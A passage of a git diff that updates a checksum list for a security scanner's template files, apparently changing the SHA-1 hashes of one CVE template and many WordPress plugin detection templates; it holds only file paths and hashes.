deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 9ed332d113..d059da4668 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2285,7 +2285,7 @@ http/cves/2023/CVE-2023-29887.yaml:511453838bafec32940df59bab8e92e1b59e8017 http/cves/2023/CVE-2023-29919.yaml:5442e826890010cd569b2a9fccf8c0cddd908d95 http/cves/2023/CVE-2023-29922.yaml:f89ff2f30ad00b2aaa054e80251634963c175245 http/cves/2023/CVE-2023-29923.yaml:4d983f47537226992d155687473e08c38a096276 -http/cves/2023/CVE-2023-30019.yaml:c22ec20ca13ae9bef095cddbccd7accce7f5ccf7 +http/cves/2023/CVE-2023-30019.yaml:2753abdaaa42026658982624b0495bf0ad21326c http/cves/2023/CVE-2023-30210.yaml:d06ef598dd9820bf574d50bd1dd2ee7540295a30 http/cves/2023/CVE-2023-30212.yaml:c677f733ec0e1f1309bf268b63c342ccc264ec9a http/cves/2023/CVE-2023-31059.yaml:9a19a54bbae40949eb308d3d7781a4c2b87aa8c6 @@ -5323,213 +5323,213 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed -http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e +http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd +http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 -http/technologies/wordpress/plugins/akismet.yaml:c2fc28f9352683a8951ff433fcd774b49feaf0eb -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc -http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 -http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 -http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b -http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 -http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 -http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 -http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 -http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f -http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b -http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365 -http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f -http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55 -http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3 -http/technologies/wordpress/plugins/cloudflare.yaml:431bca4737941e71c01f7ab9ce8f7fc45c7670a2 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e -http/technologies/wordpress/plugins/easy-google-fonts.yaml:df81c34d041dc7b560434f676ad74b5d5d74d01a -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:32a327178f46ea958960289447857fddba33ac33 -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:6b829502bedd78aae545f30777fe1f110f16a7ad -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:4ea09b17d82c48189149274385a07113cf6c77f6 -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 -http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:2c6eb5a2958fa71c5f9b9f3c9cc3f923957ae653 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:1bb251cec19a4850bae825a0ab57a25391c0d4bf -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b -http/technologies/wordpress/plugins/loginpress.yaml:9a0ec851b287c8d93465394a34c0e06dcdf58dcc -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:a2a47023bc2dcf43f32dd680bb6f59b05182696f -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/ml-slider.yaml:02dff647f100193d671151fb1e67b2f5ddcc8a53 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:323522fa2b0c8af98838b2347a51f91ceefc2067 -http/technologies/wordpress/plugins/password-protected.yaml:80067d56544816232306fefe26d8a3c1b031d7d1 -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 -http/technologies/wordpress/plugins/photo-gallery.yaml:382590e69485fae675191962251cb3c5bd385aba +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 +http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e +http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 +http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f +http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 +http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 +http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c +http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff +http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a +http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c +http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d +http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a +http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae +http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 +http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369 +http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844 +http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c +http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636 +http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e +http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a +http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f +http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7 +http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3 +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459 +http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad +http/technologies/wordpress/plugins/custom-fonts.yaml:406c61fa1dbba79b5b47c44d0b972dd409aecf8c +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f +http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0 +http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af +http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a +http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121 +http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984 +http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201 +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab +http/technologies/wordpress/plugins/elementor.yaml:9b1e616a8d2a7aa975ade54df7ac7b163608fff8 +http/technologies/wordpress/plugins/elementskit-lite.yaml:9009b721e1e10135e8fc85c73ae6f5751e4caa77 +http/technologies/wordpress/plugins/enable-media-replace.yaml:bfdc2e4c8cee949b2a0acf9cddee4a5f274c436e +http/technologies/wordpress/plugins/envato-elements.yaml:7f185f2a48254a6e7eef6b04e33ff07f51ae00ca +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:1b41b69c540670905044d6160174bac6e3d4f4fa +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:ec19e982e470dd524292e10f70375d8ae67a8444 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:55791747a6edcd4640bf8a226177d45718be4016 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:f2c919579c4175d28f460e99e74a7df0fa2ea0b1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:598bc18c24af5cbccae989df8850aca7340f8fba +http/technologies/wordpress/plugins/flamingo.yaml:5c4b2b9c517ac144776be3e131329935bae6be4d +http/technologies/wordpress/plugins/fluentform.yaml:cd0f4c67c902c283b058c0ed20d9e32affaee823 +http/technologies/wordpress/plugins/font-awesome.yaml:223d15376ae6c792e52d7b98d397937c66e393d0 +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:3bfb2d4b85fff045a44a5c46c4898e4b597b6a24 +http/technologies/wordpress/plugins/formidable.yaml:6d9ebfa32167bad11c9f2cf5d0bc667ec79beeca +http/technologies/wordpress/plugins/forminator.yaml:65bf97572551361b4820617abf6f162b6d3f9336 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:524a46fd50ca7ec755f6582146688a4fa2143b6a +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:527715654d1ac3521c3f4ad6efb0035abce008f3 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:8f722e7fd4d82c5a072583269575be55ab6d3124 +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:2e6e89dc6c07e0014c4e5eac1dd7dde3afe8f7ae +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d43e8f2af19c16d5e9d768be20676774bb14653f +http/technologies/wordpress/plugins/google-site-kit.yaml:ccc5e9a3f54cc6770ef8890b45f19920222168b0 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:c107504273792eb9abb00fe3212427a55f7e5214 +http/technologies/wordpress/plugins/gtranslate.yaml:867ab5c990ea0420f453a184bc502168a32ef7fc +http/technologies/wordpress/plugins/gutenberg.yaml:3e27b07a160e8df4cd945aaafdcae5571c5a2ffb +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:a156496d7c3273674d39d1fcec6e8e247f70ebe9 +http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1b17cd6fbfb1b2b4610c8bebd52a32d56ccb5913 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:8474198d250ca4bdc0ab5c12cf23a9b51fd06372 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:b0587c2319227b07a3d692aaa7c257888be39765 +http/technologies/wordpress/plugins/header-footer.yaml:df3106a1b40b9c5568e26e4b607dbd0d4da769e2 +http/technologies/wordpress/plugins/health-check.yaml:dbf87bd510108d015a180d3fbc03d45481974f23 +http/technologies/wordpress/plugins/hello-dolly.yaml:7b7773fcf3893f955e07987ab3d466472e47fdd7 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:acf3cb5d65df4d20d1cb4519f1cce6d463570317 +http/technologies/wordpress/plugins/imagify.yaml:07d8654f8cfc0bc3fac475b458b6f8b13ff29461 +http/technologies/wordpress/plugins/imsanity.yaml:d5a2c4b44c29eda5354bbc3339421a248342f5e4 +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:29df4caa3ec72e270a5b680cc6dba22aa42f7b30 +http/technologies/wordpress/plugins/instagram-feed.yaml:bdd26849be9346090645fcedf5e7c21f9634433e +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:4f680679454744ffce822ef8103f9e502945cc5b +http/technologies/wordpress/plugins/iwp-client.yaml:d439a22263fa52c4f97b1ddbf87db0463426d40f +http/technologies/wordpress/plugins/jetpack.yaml:bf3f2dc921b1ed41c10ceec1ddf4dc25f1b53cde +http/technologies/wordpress/plugins/kadence-blocks.yaml:16f4dd00133170c2d369e444dfcc3d37ff77d43a +http/technologies/wordpress/plugins/kirki.yaml:c97031d4389c1390ccf770aa86ab3b3fa35f1dac +http/technologies/wordpress/plugins/leadin.yaml:459b7e97592be0f092c2b3b49de24d496bc02fcc +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:24602fdc3551beca9567c9610cd9d3b4fee0f7b3 +http/technologies/wordpress/plugins/limit-login-attempts.yaml:7f83455afdb4b27fb6b3db7237206de3a6cb7046 +http/technologies/wordpress/plugins/litespeed-cache.yaml:80d84515b9a1ce2d934ae05e2f5a88f18e0ca5a8 +http/technologies/wordpress/plugins/loco-translate.yaml:6e88f4e9ef7197d8de502fd14f47f79b4b46911b +http/technologies/wordpress/plugins/loginizer.yaml:fd0116df11b6730957c17fea8fcc5ce1a7df96c0 +http/technologies/wordpress/plugins/loginpress.yaml:318058c81cfee1d55915a2fbf2ac027d7462b50c +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d96413ced20b451ef657a655f3ba333575a1b2e3 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:d166e9194d9700180585945fa717b01849fb0519 +http/technologies/wordpress/plugins/mailpoet.yaml:28a36b2dbcef7a1e49f30ff165907da3576693b4 +http/technologies/wordpress/plugins/maintenance.yaml:46343810ab17d627079432942446302dca630eeb +http/technologies/wordpress/plugins/mainwp-child.yaml:1a90cfff9eaeab8c397b5269876f7b469cfff7b4 +http/technologies/wordpress/plugins/malcare-security.yaml:20cae47466ca8201c6fbfd58324fe1bc90db9623 +http/technologies/wordpress/plugins/megamenu.yaml:dcdca3e0704e25dcc813c121039640b907274fcd +http/technologies/wordpress/plugins/members.yaml:2e78a795ed43f766f8bfd3bb528fd0ff2f0fddfb +http/technologies/wordpress/plugins/meta-box.yaml:529232e3db137e3bac4eddcee8768ec4c34e7510 +http/technologies/wordpress/plugins/ml-slider.yaml:3a91387c9a73aa27dcfe61ae0f6c73803d90410a +http/technologies/wordpress/plugins/newsletter.yaml:12033cfd493029024d58d9ff46d4d4a8d0a1c3d9 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21d9b6618fa59927c3833821306bd42ec7c89d29 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:6cabf694d018ce86f802bdac15b8f18c05c373bf +http/technologies/wordpress/plugins/ninja-forms.yaml:346bd7fe3cd6070a50760d1094b93dca734947c8 +http/technologies/wordpress/plugins/ocean-extra.yaml:42bf83b1af5749122b0405343ba20331e27e02f5 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:ff48ca47c1758494b8faf44a9e8d82c0d0545fa4 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:2859e55dd6c58174f198bb2661309cb20b9bc159 +http/technologies/wordpress/plugins/optinmonster.yaml:ad36d7e2024e606ed95427ae8fddbddcbb5be5af +http/technologies/wordpress/plugins/otter-blocks.yaml:dd77f96680874688c4f833694d8282493a4b3ba8 +http/technologies/wordpress/plugins/password-protected.yaml:6878b6ec0edd97837a248d2082b59b73a5c0bd68 +http/technologies/wordpress/plugins/pdf-embedder.yaml:b81ffb6ceaacadea709eba4d896f253a3798ae18 +http/technologies/wordpress/plugins/photo-gallery.yaml:a2d49608d9cfa92c7ff2fec2e8d158bbfd1f72dd http/technologies/wordpress/plugins/php-compatibility-checker.yaml:528a6a29383907a8488737d2302a6a1a2d929553 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 